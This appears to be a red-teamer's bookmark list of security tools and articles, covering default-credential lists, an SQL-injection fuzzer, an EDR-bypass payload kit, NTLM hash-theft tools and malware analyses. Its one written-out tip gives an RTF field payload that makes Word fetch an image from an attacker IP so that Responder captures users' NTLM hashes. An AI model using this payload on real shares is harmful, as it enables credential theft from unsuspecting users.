GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
https://github.com/ihebski/DefaultCreds-cheat-sheet

GitHub - root-tanishq/userefuzz: User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
https://github.com/root-tanishq/userefuzz

Sneaky long-term op tech: drop a Word doc with the following embedded "image" on shares:

'{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}'

Word auto-includes imgs from UNC paths; with Responder, catch hashes.

GitHub - optiv/Freeze: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
https://github.com/optiv/Freeze

GitHub - iperov/DeepFaceLive: Real-time face swap for PC streaming or video calls
https://github.com/iperov/DeepFaceLive

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
https://github.com/Greenwolf/ntlm_theft

GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper

Snakes on a Domain: An Analysis of a Python Malware Loader
https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader

Pwning ManageEngine — From Endpoint to Exploit | by Erik Wynter | Oct, 2022 | Medium
https://medium.com/@erik.wynter/pwning-manageengine-from-endpoint-to-exploit-bc5793836fd

GitHub - cisagov/RedEye: RedEye is a visual analytic tool supporting Red & Blue Team operations
https://github.com/cisagov/RedEye/

Practical Attacks against NTLMv1 - TrustedSec
https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/

Hardware Trojans Under a Microscope | by Ryan Cornateanu | Oct, 2022 | Medium
https://ryancor.medium.com/hardware-trojans-under-a-microscope-bf542acbcc29